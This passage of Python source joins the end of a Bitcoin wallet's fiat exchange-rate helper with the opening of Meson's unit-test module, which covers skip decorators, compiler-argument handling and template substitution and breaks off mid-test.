if self.config_exchange() != name:
self.config.set_key('use_exchange', name, True)
self.exchange = class_(self.on_quotes, self.on_history)
# A new exchange means new fx quotes, initially empty. Force
# a quote refresh
self.timeout = 0
def on_quotes(self):
self.network.trigger_callback('on_quotes')
def on_history(self):
self.network.trigger_callback('on_history')
def exchange_rate(self):
'''Returns None, or the exchange rate as a Decimal'''
rate = self.exchange.quotes.get(self.ccy)
if rate:
return Decimal(rate)
def format_amount_and_units(self, btc_balance):
rate = self.exchange_rate()
return '' if rate is None else "%s %s" % (self.value_str(btc_balance, rate), self.ccy)
def get_fiat_status_text(self, btc_balance, base_unit, decimal_point):
rate = self.exchange_rate()
return _(" (No FX rate available)") if rate is None else " 1 %s~%s %s" % (base_unit,
self.value_str(COIN / (10**(8 - decimal_point)), rate), self.ccy)
def value_str(self, satoshis, rate):
if satoshis is None: # Can happen with incomplete history
return _("Unknown")
if rate:
value = Decimal(satoshis) / COIN * Decimal(rate)
return "%s" % (self.ccy_amount_str(value, True))
return _("No data")
def history_rate(self, d_t):
rate = self.exchange.historical_rate(self.ccy, d_t)
# Frequently there is no rate for today, until tomorrow :)
# Use spot quotes in that case
if rate is None and (datetime.today().date() - d_t.date()).days <= 2:
rate = self.exchange.quotes.get(self.ccy)
self.history_used_spot = True
return rate
def historical_value_str(self, satoshis, d_t):
rate = self.history_rate(d_t)
return self.value_str(satoshis, rate)
|
run_unittests.py
|
#!/usr/bin/env python3
# Copyright 2016-2017 The Meson development team
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import stat
import subprocess
import re
import json
import tempfile
import textwrap
import os
import shutil
import sys
import unittest
import platform
import pickle
import functools
import io
import operator
import threading
import urllib.error
import urllib.request
import zipfile
import hashlib
from itertools import chain
from unittest import mock
from configparser import ConfigParser
from contextlib import contextmanager
from glob import glob
from pathlib import (PurePath, Path)
from distutils.dir_util import copy_tree
import mesonbuild.mlog
import mesonbuild.depfile
import mesonbuild.dependencies.base
import mesonbuild.compilers
import mesonbuild.envconfig
import mesonbuild.environment
import mesonbuild.mesonlib
import mesonbuild.coredata
import mesonbuild.modules.gnome
from mesonbuild.interpreter import Interpreter, ObjectHolder
from mesonbuild.ast import AstInterpreter
from mesonbuild.mesonlib import (
BuildDirLock, LibType, MachineChoice, PerMachine, Version, is_windows,
is_osx, is_cygwin, is_dragonflybsd, is_openbsd, is_haiku, is_sunos,
windows_proof_rmtree, python_command, version_compare, split_args,
quote_arg, relpath
)
from mesonbuild.environment import detect_ninja
from mesonbuild.mesonlib import MesonException, EnvironmentException
from mesonbuild.dependencies import PkgConfigDependency, ExternalProgram
import mesonbuild.dependencies.base
from mesonbuild.build import Target
import mesonbuild.modules.pkgconfig
from mesonbuild.mtest import TAPParser, TestResult
from run_tests import (
Backend, FakeBuild, FakeCompilerOptions,
ensure_backend_detects_changes, exe_suffix, get_backend_commands,
get_builddir_target_args, get_fake_env, get_fake_options, get_meson_script,
run_configure_inprocess, run_mtest_inprocess
)
URLOPEN_TIMEOUT = 5
@contextmanager
def chdir(path: str):
curdir = os.getcwd()
os.chdir(path)
yield
os.chdir(curdir)
def get_dynamic_section_entry(fname, entry):
if is_cygwin() or is_osx():
raise unittest.SkipTest('Test only applicable to ELF platforms')
try:
raw_out = subprocess.check_output(['readelf', '-d', fname],
universal_newlines=True)
except FileNotFoundError:
# FIXME: Try using depfixer.py:Elf() as a fallback
raise unittest.SkipTest('readelf not found')
pattern = re.compile(entry + r': \[(.*?)\]')
for line in raw_out.split('\n'):
m = pattern.search(line)
if m is not None:
return m.group(1)
return None # The file did not contain the specified entry.
def get_soname(fname):
return get_dynamic_section_entry(fname, 'soname')
def get_rpath(fname):
return get_dynamic_section_entry(fname, r'(?:rpath|runpath)')
def is_tarball():
if not os.path.isdir('docs'):
return True
return False
def is_ci():
if 'CI' in os.environ:
return True
return False
def is_pull():
# Travis
if os.environ.get('TRAVIS_PULL_REQUEST', 'false') != 'false':
return True
# Azure
if 'SYSTEM_PULLREQUEST_ISFORK' in os.environ:
return True
return False
def _git_init(project_dir):
subprocess.check_call(['git', 'init'], cwd=project_dir, stdout=subprocess.DEVNULL)
subprocess.check_call(['git', 'config',
'user.name', 'Author Person'], cwd=project_dir)
subprocess.check_call(['git', 'config',
'user.email', 'teh_coderz@example.com'], cwd=project_dir)
subprocess.check_call('git add *', cwd=project_dir, shell=True,
stdout=subprocess.DEVNULL)
subprocess.check_call(['git', 'commit', '-a', '-m', 'I am a project'], cwd=project_dir,
stdout=subprocess.DEVNULL)
@functools.lru_cache()
def is_real_gnu_compiler(path):
'''
Check if the gcc we have is a real gcc and not a macOS wrapper around clang
'''
if not path:
return False
out = subprocess.check_output([path, '--version'], universal_newlines=True, stderr=subprocess.STDOUT)
return 'Free Software Foundation' in out
def skipIfNoExecutable(exename):
'''
Skip this test if the given executable is not found.
'''
def wrapper(func):
@functools.wraps(func)
def wrapped(*args, **kwargs):
if shutil.which(exename) is None:
raise unittest.SkipTest(exename + ' not found')
return func(*args, **kwargs)
return wrapped
return wrapper
def skipIfNoPkgconfig(f):
'''
Skip this test if no pkg-config is found, unless we're on CI.
This allows users to run our test suite without having
pkg-config installed on, f.ex., macOS, while ensuring that our CI does not
silently skip the test because of misconfiguration.
Note: Yes, we provide pkg-config even while running Windows CI
'''
@functools.wraps(f)
def wrapped(*args, **kwargs):
if not is_ci() and shutil.which('pkg-config') is None:
raise unittest.SkipTest('pkg-config not found')
return f(*args, **kwargs)
return wrapped
def skipIfNoPkgconfigDep(depname):
'''
Skip this test if the given pkg-config dep is not found, unless we're on CI.
'''
def wrapper(func):
@functools.wraps(func)
def wrapped(*args, **kwargs):
if not is_ci() and shutil.which('pkg-config') is None:
raise unittest.SkipTest('pkg-config not found')
if not is_ci() and subprocess.call(['pkg-config', '--exists', depname]) != 0:
raise unittest.SkipTest('pkg-config dependency {} not found.'.format(depname))
return func(*args, **kwargs)
return wrapped
return wrapper
def skip_if_no_cmake(f):
'''
Skip this test if no cmake is found, unless we're on CI.
This allows users to run our test suite without having
cmake installed on, f.ex., macOS, while ensuring that our CI does not
silently skip the test because of misconfiguration.
'''
@functools.wraps(f)
def wrapped(*args, **kwargs):
if not is_ci() and shutil.which('cmake') is None:
raise unittest.SkipTest('cmake not found')
return f(*args, **kwargs)
return wrapped
def skip_if_not_language(lang):
def wrapper(func):
@functools.wraps(func)
def wrapped(*args, **kwargs):
try:
env = get_fake_env()
f = getattr(env, 'detect_{}_compiler'.format(lang))
f(MachineChoice.HOST)
except EnvironmentException:
raise unittest.SkipTest('No {} compiler found.'.format(lang))
return func(*args, **kwargs)
return wrapped
return wrapper
def skip_if_env_set(key):
'''
Skip a test if a particular env is set, except when running under CI
'''
def wrapper(func):
@functools.wraps(func)
def wrapped(*args, **kwargs):
old = None
if key in os.environ:
if not is_ci():
raise unittest.SkipTest('Env var {!r} set, skipping'.format(key))
old = os.environ.pop(key)
try:
return func(*args, **kwargs)
finally:
if old is not None:
os.environ[key] = old
return wrapped
return wrapper
def skip_if_not_base_option(feature):
"""Skip tests if The compiler does not support a given base option.
for example, ICC doesn't currently support b_sanitize.
"""
def actual(f):
@functools.wraps(f)
def wrapped(*args, **kwargs):
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
if feature not in cc.base_options:
raise unittest.SkipTest(
'{} not available with {}'.format(feature, cc.id))
return f(*args, **kwargs)
return wrapped
return actual
@contextmanager
def temp_filename():
'''A context manager which provides a filename to an empty temporary file.
On exit the file will be deleted.
'''
fd, filename = tempfile.mkstemp()
os.close(fd)
try:
yield filename
finally:
try:
os.remove(filename)
except OSError:
pass
@contextmanager
def no_pkgconfig():
'''
A context manager that overrides shutil.which and ExternalProgram to force
them to return None for pkg-config to simulate it not existing.
'''
old_which = shutil.which
old_search = ExternalProgram._search
def new_search(self, name, search_dir):
if name == 'pkg-config':
return [None]
return old_search(self, name, search_dir)
def new_which(cmd, *kwargs):
if cmd == 'pkg-config':
return None
return old_which(cmd, *kwargs)
shutil.which = new_which
ExternalProgram._search = new_search
try:
yield
finally:
shutil.which = old_which
ExternalProgram._search = old_search
class InternalTests(unittest.TestCase):
def test_version_number(self):
searchfunc = mesonbuild.environment.search_version
self.assertEqual(searchfunc('foobar 1.2.3'), '1.2.3')
self.assertEqual(searchfunc('1.2.3'), '1.2.3')
self.assertEqual(searchfunc('foobar 2016.10.28 1.2.3'), '1.2.3')
self.assertEqual(searchfunc('2016.10.28 1.2.3'), '1.2.3')
self.assertEqual(searchfunc('foobar 2016.10.128'), 'unknown version')
self.assertEqual(searchfunc('2016.10.128'), 'unknown version')
def test_mode_symbolic_to_bits(self):
modefunc = mesonbuild.mesonlib.FileMode.perms_s_to_bits
self.assertEqual(modefunc('---------'), 0)
self.assertEqual(modefunc('r--------'), stat.S_IRUSR)
self.assertEqual(modefunc('---r-----'), stat.S_IRGRP)
self.assertEqual(modefunc('------r--'), stat.S_IROTH)
self.assertEqual(modefunc('-w-------'), stat.S_IWUSR)
self.assertEqual(modefunc('----w----'), stat.S_IWGRP)
self.assertEqual(modefunc('-------w-'), stat.S_IWOTH)
self.assertEqual(modefunc('--x------'), stat.S_IXUSR)
self.assertEqual(modefunc('-----x---'), stat.S_IXGRP)
self.assertEqual(modefunc('--------x'), stat.S_IXOTH)
self.assertEqual(modefunc('--S------'), stat.S_ISUID)
self.assertEqual(modefunc('-----S---'), stat.S_ISGID)
self.assertEqual(modefunc('--------T'), stat.S_ISVTX)
self.assertEqual(modefunc('--s------'), stat.S_ISUID | stat.S_IXUSR)
self.assertEqual(modefunc('-----s---'), stat.S_ISGID | stat.S_IXGRP)
self.assertEqual(modefunc('--------t'), stat.S_ISVTX | stat.S_IXOTH)
self.assertEqual(modefunc('rwx------'), stat.S_IRWXU)
self.assertEqual(modefunc('---rwx---'), stat.S_IRWXG)
self.assertEqual(modefunc('------rwx'), stat.S_IRWXO)
# We could keep listing combinations exhaustively but that seems
# tedious and pointless. Just test a few more.
self.assertEqual(modefunc('rwxr-xr-x'),
stat.S_IRWXU |
stat.S_IRGRP | stat.S_IXGRP |
stat.S_IROTH | stat.S_IXOTH)
self.assertEqual(modefunc('rw-r--r--'),
stat.S_IRUSR | stat.S_IWUSR |
stat.S_IRGRP |
stat.S_IROTH)
self.assertEqual(modefunc('rwsr-x---'),
stat.S_IRWXU | stat.S_ISUID |
stat.S_IRGRP | stat.S_IXGRP)
def test_compiler_args_class(self):
cargsfunc = mesonbuild.compilers.CompilerArgs
cc = mesonbuild.compilers.CCompiler([], 'fake', False, MachineChoice.HOST, mock.Mock())
# Test that empty initialization works
a = cargsfunc(cc)
self.assertEqual(a, [])
# Test that list initialization works
a = cargsfunc(cc, ['-I.', '-I..'])
self.assertEqual(a, ['-I.', '-I..'])
# Test that there is no de-dup on initialization
self.assertEqual(cargsfunc(cc, ['-I.', '-I.']), ['-I.', '-I.'])
## Test that appending works
a.append('-I..')
self.assertEqual(a, ['-I..', '-I.'])
a.append('-O3')
self.assertEqual(a, ['-I..', '-I.', '-O3'])
## Test that in-place addition works
a += ['-O2', '-O2']
self.assertEqual(a, ['-I..', '-I.', '-O3', '-O2', '-O2'])
# Test that removal works
a.remove('-O2')
self.assertEqual(a, ['-I..', '-I.', '-O3', '-O2'])
# Test that de-dup happens on addition
a += ['-Ifoo', '-Ifoo']
self.assertEqual(a, ['-Ifoo', '-I..', '-I.', '-O3', '-O2'])
# .extend() is just +=, so we don't test it
## Test that addition works
# Test that adding a list with just one old arg works and yields the same array
a = a + ['-Ifoo']
self.assertEqual(a, ['-Ifoo', '-I..', '-I.', '-O3', '-O2'])
# Test that adding a list with one arg new and one old works
a = a + ['-Ifoo', '-Ibaz']
self.assertEqual(a, ['-Ifoo', '-Ibaz', '-I..', '-I.', '-O3', '-O2'])
# Test that adding args that must be prepended and appended works
a = a + ['-Ibar', '-Wall']
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-O3', '-O2', '-Wall'])
## Test that reflected addition works
# Test that adding to a list with just one old arg works and yields the same array
a = ['-Ifoo'] + a
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-O3', '-O2', '-Wall'])
# Test that adding to a list with just one new arg that is not pre-pended works
a = ['-Werror'] + a
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-Werror', '-O3', '-O2', '-Wall'])
# Test that adding to a list with two new args preserves the order
a = ['-Ldir', '-Lbah'] + a
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-Ldir', '-Lbah', '-Werror', '-O3', '-O2', '-Wall'])
# Test that adding to a list with old args does nothing
a = ['-Ibar', '-Ibaz', '-Ifoo'] + a
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-Ldir', '-Lbah', '-Werror', '-O3', '-O2', '-Wall'])
## Test that adding libraries works
l = cargsfunc(cc, ['-Lfoodir', '-lfoo'])
self.assertEqual(l, ['-Lfoodir', '-lfoo'])
# Adding a library and a libpath appends both correctly
l += ['-Lbardir', '-lbar']
self.assertEqual(l, ['-Lbardir', '-Lfoodir', '-lfoo', '-lbar'])
# Adding the same library again does nothing
l += ['-lbar']
self.assertEqual(l, ['-Lbardir', '-Lfoodir', '-lfoo', '-lbar'])
## Test that 'direct' append and extend works
l = cargsfunc(cc, ['-Lfoodir', '-lfoo'])
self.assertEqual(l, ['-Lfoodir', '-lfoo'])
# Direct-adding a library and a libpath appends both correctly
l.extend_direct(['-Lbardir', '-lbar'])
self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar'])
# Direct-adding the same library again still adds it
l.append_direct('-lbar')
self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar', '-lbar'])
# Direct-adding with absolute path deduplicates
l.append_direct('/libbaz.a')
self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a'])
# Adding libbaz again does nothing
l.append_direct('/libbaz.a')
self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a'])
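# Illustrative note (an assumption about the rationale, not asserted above):
# de-duplicated arguments such as -I and -L are prepended rather than
# appended presumably because compilers search those paths left to right,
# so a path added later should take precedence over an earlier one, while
# plain arguments like -O3 simply keep their append order.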
def test_compiler_args_class_gnuld(self):
cargsfunc = mesonbuild.compilers.CompilerArgs
## Test --start/end-group
linker = mesonbuild.linkers.GnuDynamicLinker([], MachineChoice.HOST, 'fake', '-Wl,', [])
gcc = mesonbuild.compilers.GnuCCompiler([], 'fake', False, MachineChoice.HOST, mock.Mock(), linker=linker)
## Ensure that the fake compiler is never called by overriding the relevant function
gcc.get_default_include_dirs = lambda: ['/usr/include', '/usr/share/include', '/usr/local/include']
## Test that 'direct' append and extend works
l = cargsfunc(gcc, ['-Lfoodir', '-lfoo'])
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Wl,--end-group'])
# Direct-adding a library and a libpath appends both correctly
l.extend_direct(['-Lbardir', '-lbar'])
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-Wl,--end-group'])
# Direct-adding the same library again still adds it
l.append_direct('-lbar')
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '-Wl,--end-group'])
# Direct-adding with absolute path deduplicates
l.append_direct('/libbaz.a')
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--end-group'])
# Adding libbaz again does nothing
l.append_direct('/libbaz.a')
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--end-group'])
# Adding a non-library argument doesn't include it in the group
l += ['-Lfoo', '-Wl,--export-dynamic']
self.assertEqual(l.to_native(copy=True), ['-Lfoo', '-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--end-group', '-Wl,--export-dynamic'])
# Arguments of the form -Wl,-l<name> (here -Wl,-ldl) are detected as libraries and get added to the group
l.append('-Wl,-ldl')
self.assertEqual(l.to_native(copy=True), ['-Lfoo', '-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--export-dynamic', '-Wl,-ldl', '-Wl,--end-group'])
def test_compiler_args_remove_system(self):
cargsfunc = mesonbuild.compilers.CompilerArgs
## Test --start/end-group
linker = mesonbuild.linkers.GnuDynamicLinker([], MachineChoice.HOST, 'fake', '-Wl,', [])
gcc = mesonbuild.compilers.GnuCCompiler([], 'fake', False, MachineChoice.HOST, mock.Mock(), linker=linker)
## Ensure that the fake compiler is never called by overriding the relevant function
gcc.get_default_include_dirs = lambda: ['/usr/include', '/usr/share/include', '/usr/local/include']
## Test that 'direct' append and extend works
l = cargsfunc(gcc, ['-Lfoodir', '-lfoo'])
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Wl,--end-group'])
## Test that to_native removes all system includes
l += ['-isystem/usr/include', '-isystem=/usr/share/include', '-DSOMETHING_IMPORTANT=1', '-isystem', '/usr/local/include']
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Wl,--end-group', '-DSOMETHING_IMPORTANT=1'])
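# Illustrative note (an assumption about why this matters): stripping
# -isystem flags that point at the compiler's own default include
# directories avoids reordering the include search path, which is known to
# break builds with e.g. GCC, while unrelated arguments such as the -D
# define above pass through untouched.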
def test_string_templates_substitution(self):
dictfunc = mesonbuild.mesonlib.get_filenames_templates_dict
substfunc = mesonbuild.mesonlib.substitute_values
ME = mesonbuild.mesonlib.MesonException
# Identity
self.assertEqual(dictfunc([], []), {})
# One input, no outputs
inputs = ['bar/foo.c.in']
outputs = []
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0],
'@PLAINNAME@': 'foo.c.in', '@BASENAME@': 'foo.c'}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
cmd = ['@INPUT@.out', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), [inputs[0] + '.out'] + cmd[1:])
cmd = ['@INPUT0@.out', '@PLAINNAME@.ok', 'strings']
self.assertEqual(substfunc(cmd, d),
[inputs[0] + '.out'] + [d['@PLAINNAME@'] + '.ok'] + cmd[2:])
cmd = ['@INPUT@', '@BASENAME@.hah', 'strings']
self.assertEqual(substfunc(cmd, d),
inputs + [d['@BASENAME@'] + '.hah'] + cmd[2:])
cmd = ['@OUTPUT@']
self.assertRaises(ME, substfunc, cmd, d)
# One input, one output
inputs = ['bar/foo.c.in']
outputs = ['out.c']
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0],
'@PLAINNAME@': 'foo.c.in', '@BASENAME@': 'foo.c',
'@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTDIR@': '.'}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
cmd = ['@INPUT@.out', '@OUTPUT@', 'strings']
self.assertEqual(substfunc(cmd, d),
[inputs[0] + '.out'] + outputs + cmd[2:])
cmd = ['@INPUT0@.out', '@PLAINNAME@.ok', '@OUTPUT0@']
self.assertEqual(substfunc(cmd, d),
[inputs[0] + '.out', d['@PLAINNAME@'] + '.ok'] + outputs)
cmd = ['@INPUT@', '@BASENAME@.hah', 'strings']
self.assertEqual(substfunc(cmd, d),
inputs + [d['@BASENAME@'] + '.hah'] + cmd[2:])
# One input, one output with a subdir
outputs = ['dir/out.c']
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0],
'@PLAINNAME@': 'foo.c.in', '@BASENAME@': 'foo.c',
'@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTDIR@': 'dir'}
# Check dictionary
self.assertEqual(ret, d)
# Two inputs, no outputs
inputs = ['bar/foo.c.in', 'baz/foo.c.in']
outputs = []
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0], '@INPUT1@': inputs[1]}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
cmd = ['@INPUT@', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), inputs + cmd[1:])
cmd = ['@INPUT0@.out', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), [inputs[0] + '.out'] + cmd[1:])
cmd = ['@INPUT0@.out', '@INPUT1@.ok', 'strings']
self.assertEqual(substfunc(cmd, d), [inputs[0] + '.out', inputs[1] + '.ok'] + cmd[2:])
cmd = ['@INPUT0@', '@INPUT1@', 'strings']
self.assertEqual(substfunc(cmd, d), inputs + cmd[2:])
# Many inputs, can't use @INPUT@ like this
cmd = ['@INPUT@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Not enough inputs
cmd = ['@INPUT2@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Too many inputs to use @PLAINNAME@ and @BASENAME@ (only defined for a single input)
cmd = ['@PLAINNAME@']
self.assertRaises(ME, substfunc, cmd, d)
cmd = ['@BASENAME@']
self.assertRaises(ME, substfunc, cmd, d)
# No outputs
cmd = ['@OUTPUT@']
self.assertRaises(ME, substfunc, cmd, d)
cmd = ['@OUTPUT0@']
self.assertRaises(ME, substfunc, cmd, d)
cmd = ['@OUTDIR@']
self.assertRaises(ME, substfunc, cmd, d)
# Two inputs, one output
outputs = ['dir/out.c']
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0], '@INPUT1@': inputs[1],
'@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTDIR@': 'dir'}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
cmd = ['@OUTPUT@', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), outputs + cmd[1:])
cmd = ['@OUTPUT@.out', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), [outputs[0] + '.out'] + cmd[1:])
cmd = ['@OUTPUT0@.out', '@INPUT1@.ok', 'strings']
self.assertEqual(substfunc(cmd, d), [outputs[0] + '.out', inputs[1] + '.ok'] + cmd[2:])
# Many inputs, can't use @INPUT@ like this
cmd = ['@INPUT@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Not enough inputs
cmd = ['@INPUT2@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Not enough outputs
cmd = ['@OUTPUT2@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Two inputs, two outputs
outputs = ['dir/out.c', 'dir/out2.c']
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0], '@INPUT1@': inputs[1],
'@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTPUT1@': outputs[1],
'@OUTDIR@': 'dir'}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
cmd = ['@OUTPUT@', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), outputs + cmd[1:])
cmd = ['@OUTPUT0@', '@OUTPUT1@', 'strings']
self.assertEqual(substfunc(cmd, d), outputs + cmd[2:])
cmd = ['@OUTPUT0@.out', '@INPUT1@.ok', '@OUTDIR@']
self.assertEqual(substfunc(cmd, d), [outputs[0] + '.out', inputs[1] + '.ok', 'dir'])
# Many inputs, can't use @INPUT@ like this
cmd = ['@INPUT@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Not enough inputs
cmd = ['@INPUT2@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Not enough outputs
cmd = ['@OUTPUT2@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Many outputs, can't use @OUTPUT@ like this
cmd = ['@OUTPUT@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
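# Illustrative sketch (hypothetical meson.build usage, not exercised by this
# test): these templates are what custom_target() command lines are written
# in, roughly
#     custom_target('gen', input: 'bar/foo.c.in', output: 'out.c',
#                   command: [prog, '@INPUT@', '-o', '@OUTPUT@'])
# where '@INPUT@' expands to the input list and '@OUTPUT@' to the output
# list exactly as substitute_values() does above; 'prog' is a placeholder
# for whatever generator program the project defines.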
def test_needs_exe_wrapper_override(self):
config = ConfigParser()
config['binaries'] = {
'c': '\'/usr/bin/gcc\'',
}
config['host_machine'] = {
'system': '\'linux\'',
'cpu_family': '\'arm\'',
'cpu': '\'armv7\'',
'endian': '\'little\'',
}
# Cannot be used as a context manager because we need to
# open it a second time, and this is not possible on
# Windows.
configfile = tempfile.NamedTemporaryFile(mode='w+', delete=False)
configfilename = configfile.name
config.write(configfile)
configfile.flush()
configfile.close()
opts = get_fake_options()
opts.cross_file = (configfilename,)
env = get_fake_env(opts=opts)
detected_value = env.need_exe_wrapper()
os.unlink(configfilename)
desired_value = not detected_value
config['properties'] = {
'needs_exe_wrapper': 'true' if desired_value else 'false'
}
configfile = tempfile.NamedTemporaryFile(mode='w+', delete=False)
configfilename = configfile.name
config.write(configfile)
configfile.close()
opts = get_fake_options()
opts.cross_file = (configfilename,)
env = get_fake_env(opts=opts)
forced_value = env.need_exe_wrapper()
os.unlink(configfilename)
self.assertEqual(forced_value, desired_value)
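# Illustrative note (restating the config built above in cross-file form):
# the override corresponds to a cross file containing
#     [properties]
#     needs_exe_wrapper = true
# which forces the result of need_exe_wrapper() regardless of what the
# [host_machine] entries would otherwise imply.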
def test_listify(self):
listify = mesonbuild.mesonlib.listify
# Test sanity
self.assertEqual([1], listify(1))
self.assertEqual([], listify([]))
self.assertEqual([1], listify([1]))
# Test flattening
self.assertEqual([1, 2, 3], listify([1, [2, 3]]))
self.assertEqual([1, 2, 3], listify([1, [2, [3]]]))
self.assertEqual([1, [2, [3]]], listify([1, [2, [3]]], flatten=False))
# Test flattening and unholdering
holder1 = ObjectHolder(1)
holder3 = ObjectHolder(3)
self.assertEqual([holder1], listify(holder1))
self.assertEqual([holder1], listify([holder1]))
self.assertEqual([holder1, 2], listify([holder1, 2]))
self.assertEqual([holder1, 2, 3], listify([holder1, 2, [3]]))
self.assertEqual([1], listify(holder1, unholder=True))
self.assertEqual([1], listify([holder1], unholder=True))
self.assertEqual([1, 2], listify([holder1, 2], unholder=True))
self.assertEqual([1, 2, 3], listify([holder1, 2, [holder3]], unholder=True))
# Unholding doesn't work recursively when not flattening
self.assertEqual([1, [2], [holder3]], listify([holder1, [2], [holder3]], unholder=True, flatten=False))
def test_extract_as_list(self):
extract = mesonbuild.mesonlib.extract_as_list
# Test sanity
kwargs = {'sources': [1, 2, 3]}
self.assertEqual([1, 2, 3], extract(kwargs, 'sources'))
self.assertEqual(kwargs, {'sources': [1, 2, 3]})
self.assertEqual([1, 2, 3], extract(kwargs, 'sources', pop=True))
self.assertEqual(kwargs, {})
# Test unholding
holder3 = ObjectHolder(3)
kwargs = {'sources': [1, 2, holder3]}
self.assertEqual([1, 2, 3], extract(kwargs, 'sources', unholder=True))
self.assertEqual(kwargs, {'sources': [1, 2, holder3]})
self.assertEqual([1, 2, 3], extract(kwargs, 'sources', unholder=True, pop=True))
self.assertEqual(kwargs, {})
# Test listification
kwargs = {'sources': [1, 2, 3], 'pch_sources': [4, 5, 6]}
self.assertEqual([[1, 2, 3], [4, 5, 6]], extract(kwargs, 'sources', 'pch_sources'))
def test_pkgconfig_module(self):
class Mock:
pass
dummystate = Mock()
dummystate.subproject = 'dummy'
mock = Mock()
mock.pcdep = Mock()
mock.pcdep.name = "some_name"
mock.version_reqs = []
# pkgconfig dependency as lib
deps = mesonbuild.modules.pkgconfig.DependenciesHelper(dummystate, "thislib")
deps.add_pub_libs([mock])
self.assertEqual(deps.format_reqs(deps.pub_reqs), "some_name")
# pkgconfig dependency as requires
deps = mesonbuild.modules.pkgconfig.DependenciesHelper(dummystate, "thislib")
deps.add_pub_reqs([mock])
self.assertEqual(deps.format_reqs(deps.pub_reqs), "some_name")
def _test_all_naming(self, cc, env, patterns, platform):
shr = patterns[platform]['shared']
stc = patterns[platform]['static']
shrstc = shr + tuple([x for x in stc if x not in shr])
stcshr = stc + tuple([x for x in shr if x not in stc])
p = cc.get_library_naming(env, LibType.SHARED)
self.assertEqual(p, shr)
p = cc.get_library_naming(env, LibType.STATIC)
self.assertEqual(p, stc)
p = cc.get_library_naming(env, LibType.PREFER_STATIC)
self.assertEqual(p, stcshr)
p = cc.get_library_naming(env, LibType.PREFER_SHARED)
self.assertEqual(p, shrstc)
# Test find library by mocking up openbsd
if platform != 'openbsd':
return
